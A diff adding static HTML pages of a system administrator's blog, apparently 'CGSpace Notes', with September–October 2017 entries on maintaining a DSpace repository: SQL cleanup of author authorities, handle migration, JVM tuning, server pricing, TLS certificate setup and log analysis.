+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(9 rows)
+</code></pre><ul>
+<li>No new one&hellip; so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | d85a8a5b-9b82-4aaf-8033-d7e0c7d9cb8f |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(10 rows)
+</code></pre><ul>
+<li>Shit, it created another authority! Let&rsquo;s try it again!</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;                                                                                             
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | d85a8a5b-9b82-4aaf-8033-d7e0c7d9cb8f |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, Alan | 9aed566a-a248-4878-9577-0caedada43db |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(11 rows)
+</code></pre><ul>
+<li>It added <em>another</em> authority&hellip; surely this is not the desired behavior, or maybe we are not using this as intented?</li>
+</ul>
+<h2 id="2017-09-14">2017-09-14</h2>
+<ul>
+<li>Communicate with Handle.net admins to try to get some guidance about the 10947 prefix</li>
+<li>Michael Marus is the contact for their prefix but he has left CGIAR, but as I actually have access to the CGIAR Library server I think I can just generate a new <code>sitebndl.zip</code> file from their server and send it to Handle.net</li>
+<li>Also, Handle.net says their prefix is up for annual renewal next month so we might want to just pay for it and take it over</li>
+<li>CGSpace was very slow and Uptime Robot even said it was down at one time</li>
+<li>I didn&rsquo;t see any abnormally high usage in the REST or OAI logs, but looking at Munin I see the average JVM usage was at 4.9GB and the heap is only 5GB (5120M), so I think it&rsquo;s just normal growing pains</li>
+<li>Every few months I generally try to increase the JVM heap to be 512M higher than the average usage reported by Munin, so now I adjusted it to 5632M</li>
+</ul>
+<h2 id="2017-09-15">2017-09-15</h2>
+<ul>
+<li>Apply CCAFS project tag corrections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \i /tmp/ccafs-projects.sql 
+DELETE 5
+UPDATE 4
+UPDATE 1
+DELETE 1
+DELETE 207
+</code></pre><h2 id="2017-09-17">2017-09-17</h2>
+<ul>
+<li>Create pull request for CGSpace to be able to resolve multiple handles (<a href="https://github.com/ilri/DSpace/pull/339">#339</a>)</li>
+<li>We still need to do the changes to <code>config.dct</code> and regenerate the <code>sitebndl.zip</code> to send to the Handle.net admins</li>
+<li>According to this <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">dspace-tech mailing list entry from 2011</a>, we need to add the extra handle prefixes to <code>config.dct</code> like this:</li>
+</ul>
+<pre tabindex="0"><code>&#34;server_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+
+&#34;replication_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+
+&#34;backup_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+</code></pre><ul>
+<li>More work on the CGIAR Library migration test run locally, as I was having problem with importing the last fourteen items from the CGIAR System Management Office community</li>
+<li>The problem was that we remapped the items to new collections after the initial import, so the items were using the 10947 prefix but the community and collection was using 10568</li>
+<li>I ended up having to read the <a href="https://wiki.lyrasis.org/display/DSDOC5x/AIP+Backup+and+Restore#AIPBackupandRestore-ForceReplaceMode">AIP Backup and Restore</a> closely a few times and then explicitly preserve handles and ignore parents:</li>
+</ul>
+<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do ~/dspace/bin/dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/87738 $item; done
+</code></pre><ul>
+<li>Also, this was in replace mode (-r) rather than submit mode (-s), because submit mode always generated a new handle even if I told it not to!</li>
+<li>I decided to start the import process in the evening rather than waiting for the morning, and right as the first community was finished importing I started seeing <code>Timeout waiting for idle object</code> errors</li>
+<li>I had to cancel the import, clean up a bunch of database entries, increase the PostgreSQL <code>max_connections</code> as a precaution, restart PostgreSQL and Tomcat, and then finally completed the import</li>
+</ul>
+<h2 id="2017-09-18">2017-09-18</h2>
+<ul>
+<li>I think we should force regeneration of all thumbnails in the CGIAR Library community, as their DSpace is version 1.7 and CGSpace is running DSpace 5.5 so they should look much better</li>
+<li>One item for comparison:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/09/10947-2919-before.jpg" alt="With original DSpace 1.7 thumbnail"></p>
+<p><img src="/cgspace-notes/2017/09/10947-2919-after.jpg" alt="After DSpace 5.5"></p>
+<ul>
+<li>Moved the CGIAR Library Migration notes to a page — <a href="/cgspace-notes/cgiar-library-migration/">cgiar-library-migration</a> — as there seems to be a bug with post slugs defined in frontmatter when you have a permalink scheme defined in <code>config.toml</code> (happens currently in Hugo 0.27.1 at least)</li>
+</ul>
+<h2 id="2017-09-19">2017-09-19</h2>
+<ul>
+<li>Nightly Solr indexing is working again, and it appears to be pretty quick actually:</li>
+</ul>
+<pre tabindex="0"><code>2017-09-19 00:00:14,953 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (0 of 65808): 17607
+...
+2017-09-19 00:04:18,017 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (65807 of 65808): 83753
+</code></pre><ul>
+<li>Sisay asked if he could import 50 items for IITA that have already been checked by Bosede and Bizuwork</li>
+<li>I had a look at the collection and noticed a bunch of issues with item types and donors, so I asked him to fix those and import it to DSpace Test again first</li>
+<li>Abenet wants to be able to filter by ISI Journal in advanced search on queries like this: <a href="https://cgspace.cgiar.org/discover?filtertype_0=dateIssued&amp;filtertype_1=dateIssued&amp;filter_relational_operator_1=equals&amp;filter_relational_operator_0=equals&amp;filter_1=%5B2010+TO+2017%5D&amp;filter_0=2017&amp;filtertype=type&amp;filter_relational_operator=equals&amp;filter=Journal+Article">https://cgspace.cgiar.org/discover?filtertype_0=dateIssued&amp;filtertype_1=dateIssued&amp;filter_relational_operator_1=equals&amp;filter_relational_operator_0=equals&amp;filter_1=%5B2010+TO+2017%5D&amp;filter_0=2017&amp;filtertype=type&amp;filter_relational_operator=equals&amp;filter=Journal+Article</a></li>
+<li>I opened an issue to track this (<a href="https://github.com/ilri/DSpace/issues/340">#340</a>) and will test it on DSpace Test soon</li>
+<li>Marianne Gadeberg from WLE asked if I would add an account for Adam Hunt on CGSpace and give him permissions to approve all WLE publications</li>
+<li>I told him to register first, as he&rsquo;s a CGIAR user and needs an account to be created before I can add him to the groups</li>
+</ul>
+<h2 id="2017-09-20">2017-09-20</h2>
+<ul>
+<li>Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite</li>
+<li>Force thumbnail regeneration for the CGIAR System Organization&rsquo;s Historic Archive community (2000 items):</li>
+</ul>
+<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &#34;ImageMagick PDF Thumbnail&#34;
+</code></pre><ul>
+<li>I&rsquo;m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org</li>
+</ul>
+<h2 id="2017-09-21">2017-09-21</h2>
+<ul>
+<li>Switch to OpenJDK 8 from Oracle JDK on DSpace Test</li>
+<li>I want to test this for awhile to see if we can start using it instead</li>
+<li>I need to look at the JVM graphs in Munin, test the Atmire modules, build the source, etc to get some impressions</li>
+</ul>
+<h2 id="2017-09-22">2017-09-22</h2>
+<ul>
+<li>Experimenting with setting up a global JNDI database resource that can be pooled among all the DSpace webapps (reference the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting</a> comments)</li>
+<li>See: <a href="https://www.journaldev.com/2513/tomcat-datasource-jndi-example-java">https://www.journaldev.com/2513/tomcat-datasource-jndi-example-java</a></li>
+<li>See: <a href="http://memorynotfound.com/configure-jndi-datasource-tomcat/">http://memorynotfound.com/configure-jndi-datasource-tomcat/</a></li>
+</ul>
+<h2 id="2017-09-24">2017-09-24</h2>
+<ul>
+<li>Start investigating other platforms for CGSpace due to linear instance pricing on Linode</li>
+<li>We need to figure out how much memory is used by applications, caches, etc, and how much disk space the asset store needs</li>
+<li>First, here&rsquo;s the last week of memory usage on CGSpace and DSpace Test:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/09/cgspace-memory-week.png" alt="CGSpace memory week">
+<img src="/cgspace-notes/2017/09/dspace-test-memory-week.png" alt="DSpace Test memory week"></p>
+<ul>
+<li>8GB of RAM seems to be good for DSpace Test for now, with Tomcat&rsquo;s JVM heap taking 3GB, caches and buffers taking 3–4GB, and then ~1GB unused</li>
+<li>24GB of RAM is <em>way</em> too much for CGSpace, with Tomcat&rsquo;s JVM heap taking 5.5GB and caches and buffers happily using 14GB or so</li>
+<li>As far as disk space, the CGSpace assetstore currently uses 51GB and Solr cores use 86GB (mostly in the statistics core)</li>
+<li>DSpace Test currently doesn&rsquo;t even have enough space to store a full copy of CGSpace, as its Linode instance only has 96GB of disk space</li>
+<li>I&rsquo;ve heard Google Cloud is nice (cheap and performant) but it&rsquo;s definitely more complicated than Linode and instances aren&rsquo;t <em>that</em> much cheaper to make it worth it</li>
+<li>Here are some theoretical instances on Google Cloud:
+<ul>
+<li>DSpace Test, <code>n1-standard-2 </code> with 2 vCPUs, 7.5GB RAM, 300GB persistent SSD: $99/month</li>
+<li>CGSpace, <code>n1-standard-4 </code> with 4 vCPUs, 15GB RAM, 300GB persistent SSD: $148/month</li>
+</ul>
+</li>
+<li>Looking at <a href="https://www.linode.com/pricing#all">Linode&rsquo;s instance pricing</a>, for DSpace Test it seems we could use the same 8GB instance for $40/month, and then add <a href="https://www.linode.com/docs/platform/how-to-use-block-storage-with-your-linode">block storage</a> of ~300GB for $30 (block storage is currently in beta and priced at $0.10/GiB)</li>
+<li>For CGSpace we could use the cheaper 12GB instance for $80 and then add block storage of 500GB for $50</li>
+<li>I&rsquo;ve sent Peter a message about moving DSpace Test to the New Jersey data center so we can test the block storage beta</li>
+<li>Create pull request for adding ISI Journal to search filters (<a href="https://github.com/ilri/DSpace/pull/341">#341</a>)</li>
+<li>Peter asked if we could map all the items of type <code>Journal Article</code> in <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI Archive</a> to <a href="https://cgspace.cgiar.org/handle/10568/3">ILRI articles in journals and newsletters</a></li>
+<li>It is easy to do via CSV using OpenRefine but I noticed that on CGSpace ~1,000 of the expected 2,500 are already mapped, while on DSpace Test they were not</li>
+<li>I&rsquo;ve asked Peter if he knows what&rsquo;s going on (or who mapped them)</li>
+<li>Turns out he had already mapped some, but requested that I finish the rest</li>
+<li>With this GREL in OpenRefine I can find items that are mapped, ie they have <code>10568/3||</code> or <code>10568/3$</code> in their <code>collection</code> field:</li>
+</ul>
+<pre tabindex="0"><code>isNotNull(value.match(/.+?10568\/3(\|\|.+|$)/))
+</code></pre><ul>
+<li>Peter also made a lot of changes to the data in the Archives collections while I was attempting to import the changes, so we were essentially competing for PostgreSQL and Solr connections</li>
+<li>I ended up having to kill the import and wait until he was done</li>
+<li>I exported a clean CSV and applied the changes from that one, which was a hundred or two less than I thought there should be (at least compared to the current state of DSpace Test, which is a few months old)</li>
+</ul>
+<h2 id="2017-09-25">2017-09-25</h2>
+<ul>
+<li>Email Rosemary Kande from ICT to ask about the administrative / finance procedure for moving DSpace Test from EU to US region on Linode</li>
+<li>Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org</li>
+<li>Peter wants me to clean up the text values for Delia Grace&rsquo;s metadata, as the authorities are all messed up again since we cleaned them up in <a href="/cgspace-notes/2016-12">2016-12</a>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;                                  
+  text_value  |              authority               | confidence              
+--------------+--------------------------------------+------------             
+ Grace, Delia |                                      |        600              
+ Grace, Delia | bfa61d7c-7583-4175-991c-2e7315000f0c |        600              
+ Grace, Delia | bfa61d7c-7583-4175-991c-2e7315000f0c |         -1              
+ Grace, D.    | 6a8ddca3-33c1-45f9-aa00-6fa9fc91e3fc |         -1
+</code></pre><ul>
+<li>Strangely, none of her authority entries have ORCIDs anymore&hellip;</li>
+<li>I&rsquo;ll just fix the text values and forget about it for now:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
+UPDATE 610
+</code></pre><ul>
+<li>After this we have to reindex the Discovery and Authority cores (as <code>tomcat7</code> user):</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    83m56.895s
+user    13m16.320s
+sys     2m17.917s
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-authority -b
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
+real    6m6.447s
+user    1m34.010s
+sys     0m12.113s
+</code></pre><ul>
+<li>The <code>index-authority</code> script always seems to fail, I think it&rsquo;s the same old bug</li>
+<li>Something interesting for my notes about JNDI database pool—since I couldn&rsquo;t determine if it was working or not when I tried it locally the other day—is this error message that I just saw in the DSpace logs today:</li>
+</ul>
+<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspaceLocal
+...
+INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspaceLocal
+INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+</code></pre><ul>
+<li>So it&rsquo;s good to know that <em>something</em> gets printed when it fails because I didn&rsquo;t see <em>any</em> mention of JNDI before when I was testing!</li>
+</ul>
+<h2 id="2017-09-26">2017-09-26</h2>
+<ul>
+<li>Adam Hunt from WLE finally registered so I added him to the editor and approver groups</li>
+<li>Then I noticed that Sisay never removed Marianne&rsquo;s user accounts from the approver steps in the workflow because she is already in the WLE groups, which are in those steps</li>
+<li>For what it&rsquo;s worth, I had asked him to remove them on 2017-09-14</li>
+<li>I also went and added the WLE approvers and editors groups to the appropriate steps of all the Phase I and Phase II research theme collections</li>
+<li>A lot of CIAT&rsquo;s items have manually generated thumbnails which have an incorrect aspect ratio and an ugly black border</li>
+<li>I communicated with Elizabeth from CIAT to tell her she should use DSpace&rsquo;s automatically generated thumbnails</li>
+<li>Start discussiong with ICT about Linode server update for DSpace Test</li>
+<li>Rosemary said I need to work with Robert Okal to destroy/create the server, and then let her and Lilian Masigah from finance know the updated Linode asset names for their records</li>
+</ul>
+<h2 id="2017-09-28">2017-09-28</h2>
+<ul>
+<li>Tunji from the System Organization finally sent the DNS request for library.cgiar.org to CGNET</li>
+<li>Now the redirects work</li>
+<li>I quickly registered a Let&rsquo;s Encrypt certificate for the domain:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop nginx
+# /opt/certbot-auto certonly --standalone --email aorth@mjanja.ch -d library.cgiar.org
+# systemctl start nginx
+</code></pre><ul>
+<li>I modified the nginx configuration of the ansible playbooks to use this new certificate and now the certificate is enabled and OCSP stapling is working:</li>
+</ul>
+<pre tabindex="0"><code>$ openssl s_client -connect cgspace.cgiar.org:443 -servername library.cgiar.org  -tls1_2 -tlsextdebug -status
+...
+OCSP Response Data:
+...
+Cert Status: good
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-10/index.html b/docs/2017-10/index.html
new file mode 100644
index 000000000..9bbea6cb5
--- /dev/null
+++ b/docs/2017-10/index.html
@@ -0,0 +1,497 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2017" />
+<meta property="og:description" content="2017-10-01
+
+Peter emailed to point out that many items in the ILRI archive collection have multiple handles:
+
+http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
+There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
+Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-10/" />
+<meta property="article:published_time" content="2017-10-01T08:07:54+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2017"/>
+<meta name="twitter:description" content="2017-10-01
+
+Peter emailed to point out that many items in the ILRI archive collection have multiple handles:
+
+http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
+There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
+Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-10/",
+  "wordCount": "2613",
+  "datePublished": "2017-10-01T08:07:54+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-10/">
+
+    <title>October, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-10/">October, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-10-01">2017-10-01</h2>
+<ul>
+<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
+</ul>
+<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+</code></pre><ul>
+<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
+<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
+</ul>
+<h2 id="2017-10-02">2017-10-02</h2>
+<ul>
+<li>Peter Ballantyne said he was having problems logging into CGSpace with &ldquo;both&rdquo; of his accounts (CGIAR LDAP and personal, apparently)</li>
+<li>I looked in the logs and saw some LDAP lookup failures due to timeout but also strangely a &ldquo;no DN found&rdquo; error:</li>
+</ul>
+<pre tabindex="0"><code>2017-10-01 20:24:57,928 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
+2017-10-01 20:22:37,982 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:failed_login:no DN found for user pballantyne
+</code></pre><ul>
+<li>I thought maybe his account had expired (seeing as it&rsquo;s was the first of the month) but he says he was finally able to log in today</li>
+<li>The logs for yesterday show fourteen errors related to LDAP auth failures:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;ldap_authentication:type=failed_auth&#34; dspace.log.2017-10-01
+14
+</code></pre><ul>
+<li>For what it&rsquo;s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET&rsquo;s LDAP server</li>
+<li>Linode emailed to say that linode578611 (DSpace Test) needs to migrate to a new host for a security update so I initiated the migration immediately rather than waiting for the scheduled time in two weeks</li>
+</ul>
+<h2 id="2017-10-04">2017-10-04</h2>
+<ul>
+<li>Twice in the last twenty-four hours Linode has alerted about high CPU usage on CGSpace (linode2533629)</li>
+<li>Communicate with Sam from the CGIAR System Organization about some broken links coming from their CGIAR Library domain to CGSpace</li>
+<li>The first is a link to a browse page that should be handled better in nginx:</li>
+</ul>
+<pre tabindex="0"><code>http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject
+</code></pre><ul>
+<li>We&rsquo;ll need to check for browse links and handle them properly, including swapping the <code>subject</code> parameter for <code>systemsubject</code> (which doesn&rsquo;t exist in Discovery yet, but we&rsquo;ll need to add it) as we have moved their poorly curated subjects from <code>dc.subject</code> to <code>cg.subject.system</code></li>
+<li>The second link was a direct link to a bitstream which has broken due to the sequence being updated, so I told him he should link to the handle of the item instead</li>
+<li>Help Sisay proof sixty-two IITA records on DSpace Test</li>
+<li>Lots of inconsistencies and errors in subjects, dc.format.extent, regions, countries</li>
+<li>Merge the Discovery search changes for ISI Journal (<a href="https://github.com/ilri/DSpace/pull/341">#341</a>)</li>
+</ul>
+<h2 id="2017-10-05">2017-10-05</h2>
+<ul>
+<li>Twice in the past twenty-four hours Linode has warned that CGSpace&rsquo;s outbound traffic rate was exceeding the notification threshold</li>
+<li>I had a look at yesterday&rsquo;s OAI and REST logs in <code>/var/log/nginx</code> but didn&rsquo;t see anything unusual:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+    141 157.55.39.240
+    145 40.77.167.85
+    162 66.249.66.92
+    181 66.249.66.95
+    211 66.249.66.91
+    312 66.249.66.94
+    384 66.249.66.90
+   1495 50.116.102.77
+   3904 70.32.83.92
+   9904 45.5.184.196
+# awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+      5 66.249.66.71
+      6 66.249.66.67
+      6 68.180.229.31
+      8 41.84.227.85
+      8 66.249.66.92
+     17 66.249.66.65
+     24 66.249.66.91
+     38 66.249.66.95
+     69 66.249.66.90
+    148 66.249.66.94
+</code></pre><ul>
+<li>Working on the nginx redirects for CGIAR Library</li>
+<li>We should start using 301 redirects and also allow for <code>/sitemap</code> to work on the library.cgiar.org domain so the CGIAR System Organization people can update their Google Search Console and allow Google to find their content in a structured way</li>
+<li>Remove eleven occurrences of <code>ACP</code> in IITA&rsquo;s <code>cg.coverage.region</code> using the Atmire batch edit module from Discovery</li>
+<li>Need to investigate how we can verify the library.cgiar.org using the HTML or DNS methods</li>
+<li>Run corrections on 143 ILRI Archive items that had two <code>dc.identifier.uri</code> values (Handle) that Peter had pointed out earlier this week</li>
+<li>I used OpenRefine to isolate them and then fixed and re-imported them into CGSpace</li>
